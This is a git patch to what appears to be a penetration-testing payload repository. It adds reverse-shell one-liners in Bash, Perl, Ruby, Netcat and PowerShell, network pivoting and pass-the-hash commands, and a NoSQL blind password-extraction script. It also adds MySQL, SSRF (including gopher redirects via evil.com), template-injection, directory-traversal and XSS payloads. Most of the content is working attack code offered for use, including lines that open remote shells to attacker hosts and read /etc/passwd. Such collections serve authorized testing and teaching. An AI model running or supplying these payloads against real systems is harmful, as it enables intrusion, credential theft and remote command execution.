From b87c3fd7ff3757631928b1dce4646df7f3f0e833 Mon Sep 17 00:00:00 2001 From: Swissky Date: Thu, 15 Feb 2018 23:27:42 +0100 Subject: [PATCH] Traversal Dir + NoSQL major updates + small addons --- .../Linux - Reverse Shell Cheatsheet.md | 62 ++++++++++- .../Network Pivoting Techniques.md | 100 ++++++++++++++++++ .../Windows - Using credentials.md | 4 + NoSQL injection/README.md | 43 +++++++- SQL injection/MySQL Injection.md | 6 ++ SSRF injection/README.md | 39 +++++++ Server Side Template injections/README.md | 45 ++++++-- Traversal directory/README.md | 29 ++++- XSS injection/README.md | 35 +++++- 9 files changed, 342 insertions(+), 21 deletions(-) create mode 100644 Methodology and Resources/Network Pivoting Techniques.md diff --git a/Methodology and Resources/Linux - Reverse Shell Cheatsheet.md b/Methodology and Resources/Linux - Reverse Shell Cheatsheet.md index c14967d3..78769a37 100644 --- a/Methodology and Resources/Linux - Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Linux - Reverse Shell Cheatsheet.md @@ -2,15 +2,32 @@ ## Reverse Shell Cheat Sheet -Bash +Bash TCP ```bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 + 0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 ``` +Bash UDP +``` +Victim: +sh -i >& /dev/udp/127.0.0.1/4242 0>&1 + +Listener: +nc -u -lvp 4242 +``` + + Perl ```perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' + +perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' + + +NOTE: Windows only +perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` Python @@ -26,12 +43,21 @@ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Ruby ```ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' + +ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' + +NOTE: Windows only +ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` -Netcat +Netcat Traditional +```bash +nc -e /bin/sh [IPADDR] [PORT] +``` + +Netcat OpenBsd ```bash -nc -e /bin/sh 10.0.0.1 1234 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f ``` @@ -41,6 +67,11 @@ ncat 127.0.0.1 4444 -e /bin/bash ncat --udp 127.0.0.1 4444 -e /bin/bash ``` +Powershell +```powershell +powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` + Java ```java r = Runtime.getRuntime() @@ -64,7 +95,32 @@ NodeJS })(); ``` +## Spawn TTY +``` +/bin/sh -i +``` + +(From an interpreter) +``` +python -c 'import pty; pty.spawn("/bin/sh")' +perl -e 'exec "/bin/sh";' +perl: exec "/bin/sh"; +ruby: exec "/bin/sh" +lua: os.execute('/bin/sh') +``` + +(From within vi) +``` +:!bash +:set shell=/bin/bash:shell +``` + +(From within nmap) +``` +!sh +``` ## Thanks to * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner) * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) +* [Spawning a TTY Shell](http://netsec.ws/?p=337) diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md new file mode 100644 index 00000000..b0e45ead --- /dev/null +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -0,0 +1,100 @@ +# Network Pivoting Techniques + +## SSH + +### SOCKS Proxy +``` +ssh -D8080 [user]@[host] + +ssh -N -f -D 9000 [user]@[host] +-f : ssh in background +-N : do not execute a remote command +``` + +### Local Port Forwarding +``` +ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host] +``` + + +### Remote Port Forwarding +``` +ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host] +``` + +## Proxychains +**Config file**: /etc/proxychains.conf +```bash +[ProxyList] +socks4 localhost 8080 +``` +Set the SOCKS4 proxy then `proxychains nmap 192.168.5.6` + +## Web SOCKS - reGeorg +``` +python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp +``` + +## Rpivot + +Server (Attacker box) +```python +python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0 +``` + +Client (Compromised box) +```python +python client.py --server-ip --server-port 9443 +``` + +Through corporate proxy +```python +python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \ +--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e +``` + +Passing the hash +```python +python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \ +--ntlm-proxy-port 8080 --domain CORP --username jdoe \ +--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE +``` + + +## Basic Pivoting Types +| Type | Use Case | +| :------------- | :------------------------------------------ | +| Listen - Listen | Exposed asset, may not want to connect out. | +| Listen - Connect | Normal redirect. | +| Connect - Connect | Can’t bind, so connect to bridge two hosts | + + +## Listen - Listen +| Type | Use Case | +| :------------- | :------------------------------------------ | +| ncat | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`| +| socat | `socat -v tcp-listen:8080 tcp-listen:9090` | +| remote host 1 | `ncat localhost 8080 < file` | +| remote host 2 | `ncat localhost 9090 > newfile` | + + +## Listen - Connect +| Type | Use Case | +| :------------- | :------------------------------------------ | +| ncat | `ncat -l -v -p 8080 -c "ncat localhost 9090"` | +| socat | `socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090` | +| remote host 1 | `ncat localhost -p 8080 < file` | +| remote host 2 | `ncat -l -p 9090 > newfile` | + + +## Connect - Connect +| Type | Use Case | +| :------------- | :------------------------------------------ | +| ncat | `ncat localhost 8080 -c "ncat localhost 9090"` | +| socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` | +| remote host 1 | `ncat -l -p 8080 < file | +| remote host 2 | `ncat -l -p 9090 > newfile` | + + +## Thanks to + * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 5c92e8e9..3e1850b0 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -47,6 +47,10 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 ``` +Note: you may need to enable it with the following command +``` +reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f +``` ## Netuse (Windows) ``` diff --git a/NoSQL injection/README.md b/NoSQL injection/README.md index d7e156a3..9b3ac209 100644 --- a/NoSQL injection/README.md +++ b/NoSQL injection/README.md @@ -3,9 +3,16 @@ NoSQL databases provide looser consistency restrictions than traditional SQL dat ## Exploit -Basic authentication bypass using not equal ($ne) +Basic authentication bypass using not equal ($ne) or greater ($gt) ``` +in URL username[$ne]=toto&password[$ne]=toto + +in JSON +{"username": {"$ne": null}, "password": {"$ne": null} } +{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} } +{"username": {"$gt": undefined}, "password": {"$gt": undefined} } + ``` Extract length information @@ -16,12 +23,39 @@ username[$ne]=toto&password[$regex]=.{3} Extract data information ``` +in URL username[$ne]=toto&password[$regex]=m.{2} username[$ne]=toto&password[$regex]=md.{1} username[$ne]=toto&password[$regex]=mdp username[$ne]=toto&password[$regex]=m.* username[$ne]=toto&password[$regex]=md.* + +in JSON +{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }} +{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }} +{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }} +``` + +## Blind NoSQL +```python +import requests +import urllib3 +import string +import urllib +urllib3.disable_warnings() + +username="admin" +password="" + +while True: + for c in string.printable: + if c not in ['*','+','.','?','|']: + payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c) + r = requests.post(u, data = {'ids': payload}, verify = False) + if 'OK' in r.text: + print("Found one more char : %s" % (password+c)) + password += c ``` ## MongoDB Payloads @@ -47,6 +81,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi ## Thanks to -* https://www.dailysecurity.fr/nosql-injections-classique-blind/ -* https://www.owasp.org/index.php/Testing_for_NoSQL_injection -* https://github.com/cr0hn/nosqlinjection_wordlists + * https://www.dailysecurity.fr/nosql-injections-classique-blind/ + * https://www.owasp.org/index.php/Testing_for_NoSQL_injection + * https://github.com/cr0hn/nosqlinjection_wordlists + * https://zanon.io/posts/nosql-injection-in-mongodb diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 824bac1d..39f42f6d 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -33,6 +33,12 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)-- ``` +Shorter to read: +``` +' and updatexml(null,concat(0x0a,version()),null)-- - +' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- - +``` + ## MYSQL Error Based - Extractvalue function ``` AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 42117709..471f98d1 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -35,6 +35,12 @@ Using this vulnerability users can upload images from any image URL = trigger an ``` ## Bypassing filters +Bypass using HTTPS +``` +https://127.0.0.1/ +https://localhost/ +``` + Bypass localhost with [::] ``` http://[::]:80/ @@ -53,6 +59,7 @@ http://0000::1:3128/ Squid Bypass localhost with a domain redirecting to locahost ``` +http://localtest.me http://n-pn.info ``` @@ -144,6 +151,37 @@ You didn't say the magic word ! QUIT ``` +Gopher:// SMTP - Back connect to 1337 +```php +Content of evil.com/redirect.php: + + +Now query it. +https://example.com/?q=http://evil.com/redirect.php. +``` +Gopher:// SMTP - send a mail +```php +Content of evil.com/redirect.php: +', + 'RCPT To: ', + 'DATA', + 'Subject: @sxcurity!', + 'Corben was here, woot woot!', + '.' + ); + + $payload = implode('%0A', $commands); + + header('Location: gopher://0:25/_'.$payload); +?> +``` + + ## SSRF on AWS Bucket Interesting path to look for at http://169.254.169.254 ``` @@ -191,3 +229,4 @@ http://0251.00376.000251.0000376/ Dotted octal with padding * [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/) * [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) * [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow) +* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/) diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index 9e0ef394..639974b1 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md @@ -2,19 +2,47 @@ Template injection allows an attacker to include template code into an existant (or not) template. +## Ruby +#### Basic injection +```python +<%= 7 * 7 %> +``` + +#### Retrieve /etc/passwd +```python +<%= File.open('/etc/passwd').read %> +``` + + +## Java +#### Basic injection +```java +${{7*7}} +``` + +#### Retrieve the system’s environment variables. +```java +${T(java.lang.System).getenv()} +``` + +#### Retrieve /etc/passwd +```java +${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} +``` + ## Jinja2 [Official website](http://jinja.pocoo.org/) > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. -Basic injection -``` +#### Basic injection +```python {{4*4}}[[5*5]] ``` Jinja2 is used by Python Web Frameworks such as Django or Flask. The above injections have been tested on Flask application. #### Template format -``` +```python {% extends "layout.html" %} {% block body %}
    @@ -27,7 +55,7 @@ The above injections have been tested on Flask application. ``` #### Dump all used classes -``` +```python {{ ''.__class__.__mro__[2].__subclasses__() }} ``` @@ -40,7 +68,7 @@ The above injections have been tested on Flask application. ``` #### Read remote file -``` +```python # ''.__class__.__mro__[2].__subclasses__()[40] = File class {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} ``` @@ -62,8 +90,9 @@ Inject this template {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` -#### Ressources & Sources -[https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) - +## Thanks to + * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) + * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) + * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/) #### Training [https://w3challs.com/](https://w3challs.com/) diff --git a/Traversal directory/README.md b/Traversal directory/README.md index fa53d197..f73742b8 100644 --- a/Traversal directory/README.md +++ b/Traversal directory/README.md @@ -1,8 +1,8 @@ # Traversal Directory -A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. +A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. ## Exploit - +Basic ``` ../ ..\ @@ -16,5 +16,28 @@ A directory traversal consists in exploiting insufficient security validation / ...\.\ ``` +16 bit Unicode encoding +``` +. = %u002e +/ = %u2215 +\ = %u2216 +``` + +Double URL encoding +``` +. = %252e +/ = %252f +\ = %255c +``` + +UTF-8 Unicode encoding +``` +. = %c0%2e, %e0%40%ae, %c0ae +/ = %c0%af, %e0%80%af, %c0%2f +\ = %c0%5c, %c0%80%5c +``` + + + ## Thanks to -* \ No newline at end of file + * https://twitter.com/huykha10/status/962419695470174208 diff --git a/XSS injection/README.md b/XSS injection/README.md index f691e181..1325bc67 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -100,6 +100,7 @@ io.swf?yid=\"));}catch(e){alert(1);}// video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// +phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// ``` XSS in Hidden input @@ -113,6 +114,20 @@ DOM XSS #"> ``` +XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic) +``` +-(confirm)(document.domain)// +; alert(1);// +``` + +XSS URL +``` +URL/ +URL/al @@ -638,6 +655,18 @@ Exotic payloads ``` +## More fun ? +This section will be used for the "fun/interesting/useless" stuff. + +Use notification box instead of an alert - by [@brutelogic](https://twitter.com/brutelogic) +Note : it requires user permission +``` +Notification.requestPermission(x=>{new(Notification)(1)}) + +Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)// +``` + + ## Thanks to * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot * tbm